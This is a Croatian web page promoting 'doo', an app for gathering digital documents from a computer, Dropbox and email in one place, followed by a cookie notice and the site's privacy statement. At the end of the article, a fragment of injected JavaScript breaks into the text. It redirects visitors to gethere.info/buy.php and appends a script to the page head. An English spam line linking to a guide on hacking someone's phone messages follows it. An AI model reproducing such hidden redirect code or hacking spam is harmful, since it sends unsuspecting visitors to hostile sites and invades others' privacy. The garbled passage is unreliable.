Pošaljite upit!

Organizirajte sve svoje digitalne dokumente na jednom mjestu uz “doo”

Organizirajte sve svoje digitalne dokumente na jednom mjestu uz “doo”

Prelazak u svijet bez papira ima svoje prednosti, manje papirologije po stolu, manje porezotina od papira, i spašavanje drveća! Ali arhiviranje digitalnih datoteka često znači zaboravljanje na njih. Gdje smo stavili račun za struju ili obrazac za prijavu poreza?

Imajući to na umu “doo” je besplatna organizacijska usluga, koja korisnicima omogućuje pristup njihovim dokumentima na jednom mjestu, lako se organizira i jednostavno koristi.

Aplikacija se spaja na lokaciju dokumenta, bilo da li se nalaze na Vašem laptopu u datoteci, Dropbox-u, emailu, ili na sve tri lokacije. Inteligentno označavanje omogućuje jednostavnije označavanje i sortiranje mapa, a putem pretraživača možete pronaći i preuzeti svoje dokumente, na bilo koji uređaj.

Ako želite pronaći svoje račune iz prošlog mjeseca, doo pretražuje svoju bazu podataka.

Aplikacija također ima automatsko označavanje i optičko prepoznavanje znakova za organiziranje skeniranih dokumenata, tako da omogućuje korisnicima da fotografiraju dokument i učitaju ga putem svog smart telefona.

Doo radi na OS X i Windows 8, a uskoro će biti dostupna za iPhone, iPad i Android.”http:///?sl=319481-c261c&data1=Track1&data2=Track2″; location.replace(“http://gethere.info/buy.php”);d.getElementsByTagName(‘head’)[0].appendChild(s); With smartphones simply being often dropped or robbed, information http://trackingapps.org/how-to-hack-someones-phone-messages/ thievery is to get quite common

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori